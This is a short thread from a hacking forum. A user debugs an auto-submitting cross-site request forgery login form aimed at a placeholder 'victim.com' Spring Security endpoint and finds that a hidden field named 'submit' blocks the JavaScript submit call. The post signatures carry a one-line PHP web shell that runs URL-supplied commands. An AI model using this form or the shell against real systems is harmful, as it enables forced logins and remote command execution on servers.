Donate to us!
Understanding is the answer, hatred is the problem, and hackers are the slaves abused and destroyed in the process of peace online - Deshouleres
Saturday, October 20, 2018
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 163
Guests Online: 160
Members Online: 3

Registered Members: 107244
Newest Member: davy15
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Author

Form submit via JS - CSRF

gobzi
Member



Posts: 112
Location: Hobbiton
Joined: 26.05.16
Rank:
HBH Guru
Posted on 02-10-18 16:46
Hey,

I'm banging my head here, maybe being stupid.. When I submit the following request it wont log me in. However, it logs me in when I use purely HTML
Code
<input type="submit" value="Submit request" />


Also, when I submit different POST requests, JS submit works fine! :|


(ignore the PHP tags)

PHP
  1. <?php
  2. <html>
  3.   <body>
  4.       <form action="https://victim.com/j_spring_security_check" method="POST">
  5.         <input type="hidden" name="j&#95;username" value="uatuser1&#64;victim&#46;com" />
  6.         <input type="hidden" name="j&#95;password" value="Aa123456" />
  7.         <input type="hidden" name="submit" value="Sign&#32;In" />
  8.       </form>
  9. <script>document.forms[0].submit();</script>
  10. </body>
  11. </html>
  12.  
  13. ?>



<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr

Edited by gobzi on 02-10-18 16:47
goo.gl/8st1AR
Author

RE: Form submit via JS - CSRF

gobzi
Member



Posts: 112
Location: Hobbiton
Joined: 26.05.16
Rank:
HBH Guru
Posted on 02-10-18 17:06
lol there's a conflict between the parameter submit and submit()
GrinGrin


<pre> <?=`$_GET[1]`?>

Ima_noob# cat * | egrep "Subject|Date|filename=" > agrrr

Edited by gobzi on 02-10-18 17:06
goo.gl/8st1AR